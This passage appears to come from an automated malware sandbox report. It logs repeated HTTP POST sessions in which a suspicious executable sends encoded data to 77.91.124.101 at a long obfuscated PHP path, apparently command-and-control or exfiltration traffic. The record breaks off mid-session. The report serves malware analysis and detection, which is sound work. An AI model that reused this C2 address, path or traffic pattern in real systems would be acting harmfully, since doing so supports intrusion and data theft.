                                                            51192.168.2.54976577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:00.456012964 CET366OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:00.658432961 CET368INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:00.658720016 CET370OUTData Raw: 57 5f 58 58 5b 5e 5a 50 5d 57 55 57 55 5c 57 50 50 5b 58 43 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XX[^ZP]WUWU\WPP[XCVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8<+==U<;7%#:5\<3=%$!.;?/Y8&G''^)/
                                                            Nov 21, 2023 04:48:00.863715887 CET371INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:00 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            52192.168.2.54976677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:01.192553997 CET372OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:01.389041901 CET372INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:01.389336109 CET375OUTData Raw: 57 5c 5d 5e 5b 5b 5a 5a 5d 57 55 57 55 5d 57 52 50 58 58 46 56 50 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]^[[ZZ]WUWU]WRPXXFVPW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(-^<8"W># /4(#>Q&=!'#=9("\<,8>&G''^)+
                                                            Nov 21, 2023 04:48:01.590692997 CET375INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5277.91.124.10180192.168.2.549766C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:01.192553997 CET372OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:01.389041901 CET372INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:01.389336109 CET375OUTData Raw: 57 5c 5d 5e 5b 5b 5a 5a 5d 57 55 57 55 5d 57 52 50 58 58 46 56 50 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\]^[[ZZ]WUWU]WRPXXFVPW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(-^<8"W># /4(#>Q&=!'#=9("\<,8>&G''^)+
                                                            Nov 21, 2023 04:48:01.590692997 CET375INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5377.91.124.10180192.168.2.549767C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:01.912075996 CET376OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.110807896 CET376INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.111066103 CET378OUTData Raw: 52 5b 58 5c 5b 59 5a 59 5d 57 55 57 55 5c 57 51 50 5e 58 49 56 50 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[X\[YZY]WUWU\WQP^XIVPW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<(2T*3<,:#)](6R3>"P$0*."<;\/&G''^)/
                                                            Nov 21, 2023 04:48:02.314310074 CET379INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            53192.168.2.54976777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:01.912075996 CET376OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.110807896 CET376INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.111066103 CET378OUTData Raw: 52 5b 58 5c 5b 59 5a 59 5d 57 55 57 55 5c 57 51 50 5e 58 49 56 50 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[X\[YZY]WUWU\WQP^XIVPW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<(2T*3<,:#)](6R3>"P$0*."<;\/&G''^)/
                                                            Nov 21, 2023 04:48:02.314310074 CET379INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:01 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            54192.168.2.54976877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:02.628360987 CET380OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.826001883 CET380INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.826369047 CET382OUTData Raw: 57 5a 5d 5c 5e 5d 5a 5f 5d 57 55 57 55 5d 57 56 50 5a 58 44 56 57 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\^]Z_]WUWU]WVPZXDVWW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+!Y=+= 'Z;&[")&?&3V$.V:?/(->&G''^)+
                                                            Nov 21, 2023 04:48:03.029112101 CET383INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:02 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5477.91.124.10180192.168.2.549768C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:02.628360987 CET380OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:02.826001883 CET380INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:02.826369047 CET382OUTData Raw: 57 5a 5d 5c 5e 5d 5a 5f 5d 57 55 57 55 5d 57 56 50 5a 58 44 56 57 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZ]\^]Z_]WUWU]WVPZXDVWW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+!Y=+= 'Z;&[")&?&3V$.V:?/(->&G''^)+
                                                            Nov 21, 2023 04:48:03.029112101 CET383INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:02 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5577.91.124.10180192.168.2.549769C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:03.347954988 CET384OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:03.546896935 CET384INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:03.547147036 CET386OUTData Raw: 57 5f 58 50 5e 5e 5f 5e 5d 57 55 57 55 5d 57 52 50 52 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XP^^_^]WUWU]WRPRXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')2(+>S>#$/2_4^<*V$2R0)-;>X?4/&G''^)+
                                                            Nov 21, 2023 04:48:03.755608082 CET387INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:03 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            55192.168.2.54976977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:03.347954988 CET384OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:03.546896935 CET384INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:03.547147036 CET386OUTData Raw: 57 5f 58 50 5e 5e 5f 5e 5d 57 55 57 55 5d 57 52 50 52 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_XP^^_^]WUWU]WRPRXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')2(+>S>#$/2_4^<*V$2R0)-;>X?4/&G''^)+
                                                            Nov 21, 2023 04:48:03.755608082 CET387INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:03 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5677.91.124.10180192.168.2.549770C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:04.080090046 CET387OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.278098106 CET388INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.278456926 CET390OUTData Raw: 57 58 5d 5a 5b 52 5a 5f 5d 57 55 57 55 5b 57 5a 50 53 58 44 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WX]Z[RZ_]WUWU[WZPSXDVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')81<.S* (/-7))\?9$[1&31.;:\+,;\,&G''^)3
                                                            Nov 21, 2023 04:48:04.481086016 CET391INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            56192.168.2.54977077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:04.080090046 CET387OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.278098106 CET388INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.278456926 CET390OUTData Raw: 57 58 5d 5a 5b 52 5a 5f 5d 57 55 57 55 5b 57 5a 50 53 58 44 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WX]Z[RZ_]WUWU[WZPSXDVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')81<.S* (/-7))\?9$[1&31.;:\+,;\,&G''^)3
                                                            Nov 21, 2023 04:48:04.481086016 CET391INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5777.91.124.10180192.168.2.549771C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:04.800623894 CET391OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.999392986 CET392INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.999623060 CET394OUTData Raw: 57 50 5d 5d 5b 58 5f 5b 5d 57 55 57 55 5a 57 51 50 5b 58 42 56 55 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]][X_[]WUWUZWQP[XBVUWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(!+*S> #_/"":< 9&."'..<;Y;&G''^)7
                                                            Nov 21, 2023 04:48:05.205761909 CET395INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            57192.168.2.54977177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:04.800623894 CET391OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:04.999392986 CET392INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:04.999623060 CET394OUTData Raw: 57 50 5d 5d 5b 58 5f 5b 5d 57 55 57 55 5a 57 51 50 5b 58 42 56 55 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]][X_[]WUWUZWQP[XBVUWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X)(!+*S> #_/"":< 9&."'..<;Y;&G''^)7
                                                            Nov 21, 2023 04:48:05.205761909 CET395INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:04 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5877.91.124.10180192.168.2.549772C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:05.520483971 CET395OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:05.718169928 CET396INHTTP/1.1 100 Continue
